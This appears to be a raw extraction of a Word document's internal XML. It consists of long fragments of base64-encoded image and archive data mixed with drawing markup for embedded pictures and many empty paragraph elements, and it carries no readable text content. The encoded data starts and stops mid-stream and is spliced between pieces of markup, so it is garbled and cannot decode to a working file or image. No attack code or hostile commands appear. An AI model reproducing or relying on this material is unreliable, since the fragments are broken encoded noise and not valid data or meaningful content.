aadwKVbd&#10;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i8cCaawMAAGwIAAAOAAAAAAAAAAAA&#10;AAAAADwCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQASFLT00qsCANKrAgAVAAAAAAAA&#10;AAAAAAAAANMFAABkcnMvbWVkaWEvaW1hZ2UxLmpwZWdQSwECLQAUAAYACAAAACEA/y3h2uAAAAAK&#10;AQAADwAAAAAAAAAAAAAAAADYsQIAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAFhgsxu6&#10;AAAAIgEAABkAAAAAAAAAAAAAAAAA5bICAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAA&#10;AAYABgB9AQAA1rMCAAAA&#10;">
                <v:shape id="Image 55" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:95;width:29616;height:3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HeewwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva+KCf6hGEUHYgwjb7mVvz+bZFpuXkkSt394sCB6HmfkNs9r0thU38qFxrGEyViCI&#10;S2carjT8FvvPBYgQkQ22jknDgwJs1oOPFWbG3fmHbnmsRIJwyFBDHWOXSRnKmiyGseuIk3d23mJM&#10;0lfSeLwnuG3ll1IzabHhtFBjR7uaykt+tRpil//N1Fz5bbjMr8fHoTifbKH1aNhvlyAi9fEdfrW/&#10;jYbpFP6/pB8g108AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA2qh3nsMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId46" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 56" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:29712;height:32157;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2971165,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6evQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BCsIw&#10;EETvgv8QVvBmUwVFqrGIoAierH7A2qxtsdmUJtr690YQPA7zZoZZp72pxYtaV1lWMI1iEMS51RUX&#10;Cq6X/WQJwnlkjbVlUvAmB+lmOFhjom3HZ3plvhChhF2CCkrvm0RKl5dk0EW2IQ7e3bYGfZBtIXWL&#10;XSg3tZzF8UIarDgslNjQrqT8kT2Ngj32Zl6fKCAHzE/nm31nh6NS41G/XYHw1Ps//EsftYL5Ar5f&#10;wg+Qmw8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAAAAAA&#10;AAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAJxOOnr0AAADbAAAADwAAAAAAAAAA&#10;AAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPECAAAAAA==&#10;" path="m,3215640r2971165,l2971165,,,,,3215640xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539CAC0" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25240902" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727A62B9" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2A3A9B" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B173F9F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F0A582" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0A318A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1B2F48" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F1C72F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D730A5F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7161D678" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516DB274" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7863E587" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6960A2" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04ACF29C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E3F048" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38860167" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F0A104" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355DCCB4" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="187"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A82DC58" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:ind w:left="510" w:hanging="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487596032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E9FABE1" wp14:editId="1E919D66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>923925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>155759</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5381625" cy="317690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1625" cy="3176905"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5381625" cy="3176905"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="58" name="Image 58"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId47" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9461"/>
                            <a:ext cx="5362575" cy="3157601"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="59" name="Graphic 59"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="5372100" cy="3167380"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="5372100" h="3167380">
                                <a:moveTo>
                                  <a:pt x="0" y="3167126"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5372100" y="3167126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5372100" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="316712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BBA279" id="Group 57" o:spid="_x0000_s1026" style="position:absolute;margin-left:72.75pt;margin-top:12.25pt;width:423.75pt;height:250.15pt;z-index:-15720448;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="53816,31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IpM1xAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWbU/bMBD+Pmn/&#10;Icp3SFtoSyNaNNGBkBBDg2mfXcdJLBzbs90X/v3u7DgN7SY2KjU51+fz4+eeO/fyateIZMOM5UrO&#10;0+HpIE2YpKrgspqnP55vTi7SxDoiCyKUZPP0ldn0avH50+VW52ykaiUKZhIIIm2+1fO0dk7nWWZp&#10;zRpiT5VmEiZLZRriYGiqrDBkC9EbkY0Gg0m2VabQRlFmLfy6DJPpwscvS0bdt7K0zCVingI255/G&#10;P1f4zBaXJK8M0TWnLQzyARQN4RI27UItiSPJ2vCjUA2nRllVulOqmkyVJafMnwFOMxwcnObWqLX2&#10;Z6nybaU7moDaA54+HJY+bG6NftKPJqAH817RFwu8ZFtd5f15HFd7511pGlwEh0h2ntHXjlG2cwmF&#10;H8dnF8PJaJwmFObOhtPJbDAOnNMaEnO0jtZf31mZkTxs7OF1cDSnOXxbisA6ouh9KcEqtzYsbYM0&#10;/xSjIeZlrU8gm5o4vuKCu1evTMgbgpKbR06RXRwAm48m4QUQA3UhSQMVcdeQiiUwBsqjD67ADBwF&#10;WAmub7gQyDvaLVQQ9IEg/nDaILalouuGSReqxzABqJW0Ndc2TUzOmhUDeOauGELSoHIdQNSGSxfS&#10;Zp1hjta4fwk4vkOBIVCSdxMe9B4nHsG28jpQzGyMygBhzM4nwxB+rxtQzbTTzXg6GXiPLvsk18a6&#10;W6aaBA1ADEiAcpKTzb1tMUWXlskAw+MDVNgioOfYyCGMjlj8r7J6qolmAAHD9hI9i4m+bbvMeIZn&#10;bb2w8trRX1g6n05GniVvgC/J9yxNR8MBtLVQXZPp2YXvaD2W6Dqw1GcGulQROAK26mjRnYwmcokN&#10;U/iG6UAXwG+aQMNchTSB1HEdBkUz2WKlt1hqLPQABecbtWHPynu6fbmjx3A0wWgAdu8jZN+3i+mb&#10;R39F9Itv7WP3/SMR0SO+gydwFpsV7B/n4rvv8xZp9KBCWRbAIwH+FB0pELFPu5DIjxc70mCV4EWs&#10;YWuq1bUwyYbg/eQ/LSdv3FDIS2Lr4OenWjchYW/UUlAPWitVvEKX2YLc5qn9tSbY0sSdBHnjDRgN&#10;E41VNIwT18rfkz5dsOfz7icxuq0wB7J7UFHlR4UWfHGlVF/WTpXcV+EeUQsUKs5b/krzxLXXL96Z&#10;/bH32v9JWPwGAAD//wMAUEsDBAoAAAAAAAAAIQC1OrC3IN4DACDeAwAVAAAAZHJzL21lZGlhL2lt&#10;YWdlMS5qcGVn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoH&#10;BwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkU&#10;DQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAAR&#10;CAKyBJ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8WftlvoX9tx2+n2qtYXUtol1fJJHbPIjupywY8DaMkd2HFdb+zd8e/EHxi1fxHZ63pe&#10;k2kGnwW09pe6PcNNDdLKZASC3oY+nB5r4u+KP7OHxV8Q+KdSEXgPUrzTI9V1CWMxGMeYk07usqkt&#10;1ww6+gr6Q/YQ+GvjD4cy+KbbxH4avfD1gbe1jszfMhknYPO0h+UkDG9ePTHWp94+mxGAwOHwrn7Z&#10;Sm4wkrPW8rXjy2eyvd3TTjZrVH0rp3je11Wa2htLeea4lmljaJduYURyjSPzwuRx3PYdcXNZ8R22&#10;l6NqV9E8d41lE0rwxyjPAPBxnHT0rk/DHhTWfCU813awpMb64m+12zuuVBkcxSo2ewYblz9OeuZP&#10;4L168hlLWZjnk0m4tJt00QR5m2bQipgCPg4zz1yB1NHzJ6Tp2om/a4Bt3hEThQzMpD5UNkYJI645&#10;waxU8cCaS1jh0y5lkurie3hXfGN3lZ3Ny3A+U471Y8LaTc6Xc629wgRbq8E0WGByvkxLn25U1y2k&#10;aJ/wkP8AZex2MFlf6gLkwXBjkiLM4XlSGB5FAHbaJrtvrljFcRhoWcuphlIDqyMVYcHnBB5HFWZN&#10;Ts4lVnu4EVuQWkAB5xxzXEafoGs6Vd6RO1gLoadFc2WIHjQyo5Uxy4JAH3cMODk5ANQ+GvAt5bpa&#10;f2nYwOY9JltCrMsgWRpWbA9ip60Ad9Lf2sDhJLmGNyQArOATnp+dQR6tGZ7pJ1+ypBIIxJLIgWT5&#10;Q2Rg5GM98Hj0rhLbwLqD6RrC3dpFLfT6LbWcDuysfORJNwz2+Yrz7D0qY+Cr+41WGW4to5bcatFd&#10;uHdWBRbVUJx3+cdPxoA7xtQtUtluGuYVgbpKZAFP49KpT+IIYdV06zWNpkvt4juI2UoGRSxB5z0F&#10;cfBoF5ouurdXFrHc2S3t3JDZCWMMFkCESIrMF4IcEZBG8mqPg1kSXwnEFhhdr3UJ1giYELG3m7Sv&#10;T5fQ4xQB6nWXq2ux6XcWtqkEt5e3O7yreHGSq43MSSAAMjk+oqzcaeLi5im+0XEezH7uOTCN9R3r&#10;K1jT7yDxBY6xZQfa/Lhe1ntgyq5RmVgyFsDIK9CRkH25ALWneI4LyS6hnRrC6tSomhuCo2hs7CCC&#10;QQcHGD2NXU1KzkkjjW6gaSQZRBICWHqBnmuI1zwjqHiG5ub+a0SNp7iyVbSSRSVgilLMXwduTuPA&#10;J4A55pviTwzq+o6lOYbT5Eu7aW1kheOONIkZC+R98vww9NvQ9iAdV4j8S23h/SdQu90dxPaQNObU&#10;ShXY